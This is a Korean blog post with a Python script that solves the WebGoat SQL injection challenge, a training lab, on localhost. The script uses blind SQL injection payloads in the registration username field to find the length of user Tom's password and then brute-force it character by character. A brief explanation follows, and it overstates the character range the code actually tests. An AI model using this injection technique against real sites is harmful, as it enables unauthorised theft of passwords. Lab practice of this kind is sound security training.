[ํŒŒ์ด์ฌ] WebGoat Brute Force ํŒŒ์ด์ฌ ์ฝ”๋“œ

2019. 4. 28. 00:54ยท๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€

import requests

password = str()
cre = "created"
url = "http://localhost:8080/WebGoat/SqlInjection/challenge"
cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'}

print ('[*] Get password length...')
password_length = int()

for length in range(1,30):
    datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length,  'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}

    r = requests.put(url,datas,cookies=cookie)
    password_length+=1
   
    if 'created' in r.content.decode():
        print(password_length)
        continue

    if 'exists' in r.content.decode():
        break

    if "Internal Server Error" in r.content.decode():
        print("SQL ERROR")
        print(r.text)
        break
   
print ('[!] Done!!!')
print ("[*] Length of password id %d" % password_length)
print ('[*] Hack the password')

for i in range(1, password_length +1 ):
    for c in range(0x61,0x7b):

        payload = "tom' and substr(password, %d, 1) = '%c' and '1'='1" % (i, c)
        data = {'username_reg': payload, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}
        r = requests.put(url,data,cookies=cookie)
     
        print(r.content.decode())
        print(password)
        
        if 'created' in r.content.decode():
            continue

        if 'different' in r.content.decode():
            password += chr(c)
            break
        
        if 'Internal Server Error' in r.content.decode():
  
            continue

print ("[*] Tom's pw : %s" % password)

request ํŒจํ‚ท์„ challenge์— ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ๋ณด๋‚ธ๋‹ค. ID ๋ถ€๋ถ„์— blind sql injection์œผ๋กœ ๋น„๋ฐ€๋ฒˆํ˜ธ ๊ธธ์ด๋ฅผ ์•Œ์•„๋‚ธ๋‹ค. response ํŒจํ‚ท์œผ๋กœ ๋ณธ๋ฌธ ๋‚ด์šฉ์ค‘์— created ๋˜๋Š” exists ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์„๊ฒฝ์šฐ ๋‹ค์Œ ๋กœ์ง์„ ์ฒ˜๋ฆฌํ•œ๋‹ค. ๊ธธ์ด๋ฅผ ์•Œ์•„๋‚ธํ›„ Brute Force๋ฅผ ์ˆ˜ํ–‰ํ•œ๋‹ค. a~zA~z ๋ฌธ์ž์˜ ๋ฒ”์œ„๋กœ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํƒ์ƒ‰ํ•œ๋‹ค. ๋ฌธ์ž ๋น„๊ต sql ์„ ๋งŒ๋“ค์–ด blind injection์„ ์ˆ˜ํ–‰ํ•œ๋‹ค. response์˜ ํŒจํ‚ท ๋‚ด์šฉ์„ ํ†ตํ•ด ์‘๋‹ต์„ ํŒ๋‹จํ•˜๊ณ  ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ฐพ์•„๋‚ด๊ฒŒ ๋œ๋‹ค.

์ €์ž‘์žํ‘œ์‹œ ๋น„์˜๋ฆฌ ๋ณ€๊ฒฝ๊ธˆ์ง€ (์ƒˆ์ฐฝ์—ด๋ฆผ)

'๐Ÿค–์ •๋ณด๋ณด์•ˆ > โค๏ธ๋ ˆ๋“œํŒ€' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[์ •๋ณด] HTTPs/TLS Attacks์ด๋ž€  (0) 2023.02.15
[์ •๋ณด] ๋ฆฌ๋ฒ„์‹ฑ ๊ธฐ์ดˆ ๊ฐœ๋…  (0) 2023.02.15
[์ •๋ณด] ์‚ฌ์ดํŠธ ๋ถ„์„ ๋ฐฉ๋ฒ•  (0) 2023.02.15
[ํŒŒ์ด์ฌ] ๊ถŒํ•œ ์ƒ์Šน ๋ช…๋ น์–ด(๊ฐ„๋‹จ ์ตœ์ข…)  (3) 2022.07.01
[ํŒŒ์ด์ฌ] ๊ถŒํ•œ ์ƒ์Šน ์š”์ฒญ ์ฝ”๋“œ(2022 ์ตœ์‹ )  (0) 2022.07.01
'๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [์ •๋ณด] ๋ฆฌ๋ฒ„์‹ฑ ๊ธฐ์ดˆ ๊ฐœ๋…
  • [์ •๋ณด] ์‚ฌ์ดํŠธ ๋ถ„์„ ๋ฐฉ๋ฒ•
  • [ํŒŒ์ด์ฌ] ๊ถŒํ•œ ์ƒ์Šน ๋ช…๋ น์–ด(๊ฐ„๋‹จ ์ตœ์ข…)
  • [ํŒŒ์ด์ฌ] ๊ถŒํ•œ ์ƒ์Šน ์š”์ฒญ ์ฝ”๋“œ(2022 ์ตœ์‹ )
TwoIceFish
TwoIceFish
https://github.com/TwoIceFIsh
  • TwoIceFish
    Cyber-Luna
    TwoIceFish
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๋ถ„๋ฅ˜ ์ „์ฒด๋ณด๊ธฐ (593)
      • ๐Ÿค–์ •๋ณด๋ณด์•ˆ (77)
        • ๐Ÿ’™๋ธ”๋ฃจํŒ€ (24)
        • โค๏ธ๋ ˆ๋“œํŒ€ (21)
        • ๐Ÿ’œํผํ”ŒํŒ€ (1)
        • ๐Ÿ’ 1๋ถ„์ง€์‹ (30)
      • ํ”„๋กœ์ ํŠธ (14)
        • ๐Ÿ’Œ ์ •๋ณด๋ณด์•ˆ ๋ฉ”์ผ๋ง ์‹œ์Šคํ…œ (8)
        • ๐Ÿ” ์ธ์ฆ์„œ ๊ด€๋ฆฌ ์‹œ์Šคํ…œ (1)
        • ๐Ÿ ๊ธˆ์œต ์ปค๋ฎค๋‹ˆํ‹ฐ (5)
      • ๐Ÿžํ”„๋กœ๊ทธ๋ž˜๋ฐ (49)
        • Next.js (9)
      • ๊ธฐํƒ€์ •๋ณด (68)
        • ๐ŸŒ๊ทธ๋ฆฟ์š”๊ฑฐํŠธ (11)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ๋ฐฉ๋ช…๋ก
    • ๋กœ์ผ“ํŽ€์น˜
    • ๊นƒํ—ˆ๋ธŒ
    • ์ฝ”์ฝ”๋„ˆ์ธ 
    • ๊ทธ๋ฆฟ์š”๊ฑฐํŠธ
  • ๋งํฌ

  • ๊ณต์ง€์‚ฌํ•ญ

    • ์•ˆ๋…•ํ•˜์„ธ์š”
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    Visual Studio
    ISMS-P
    ๋ถ€ํŠธ์ŠคํŠธ๋žฉ
    ์™€์ดํŒŒ์ด ๋น„๋ฐ€๋ฒˆํ˜ธ ํƒˆ์ทจ
    vpn ์„ค์น˜
    ์• ํ”ŒํŽ˜์ด ์„ค์ •๋ฐฉ๋ฒ•
    ์ธ์ฆ์„œ ์—ฌ๋Ÿฌ๊ฐœ
    jsp
    ๋ฐฉ๋ฒ™
    ๋ชจ์˜ํ•ดํ‚น
    ์‘๋‹ต์—†์Œ
    ์‚ผ์„ฑ์ „์ž์šฐ
    ์„œ๋ธŒ๋„๋ฉ”์ธ ์ธ์ฆ์„œ
    tomcat servlet
    ์ˆ˜์ต๋ฅ  ๊ณ„์‚ฐ๊ธฐ
    ์ง€๊ฐ‘ ์•ฑ์— ์นด๋“œ ์ถ”๊ฐ€
    ์ฝ”์ฝ”๋„›์ธ 
    ๋ถ€๋™์‚ฐ ์ˆ˜์ต๋ฅ  ๊ณ„์‚ฐ๊ธฐ
    ๋ฉ”์ผํ—ค๋”๋ถ„์„
    servlet 404
    nmap
    jsp 200
    SKํ•˜์ด๋‹‰์Šค
    ํ†ฐ์บฃ ์„œ๋ธ”๋ฆฟ
    eclipse
    ์•…์„ฑ๋ฉ”์ผ
    ์œ ๋‹ˆํ‹ฐ
    ๋‹จ์ผ ๋„๋ฉ”์ธ ์ธ์ฆ์„œ ์—ฌ๋Ÿฌ๊ฐœ
    vpn ์˜คํ”ˆ์†Œ์Šค
    ์•…์„ฑ๋ฉ”์žƒ๋ถ„์„
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.0
TwoIceFish
[ํŒŒ์ด์ฌ] WebGoat Brute Force ํŒŒ์ด์ฌ ์ฝ”๋“œ
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”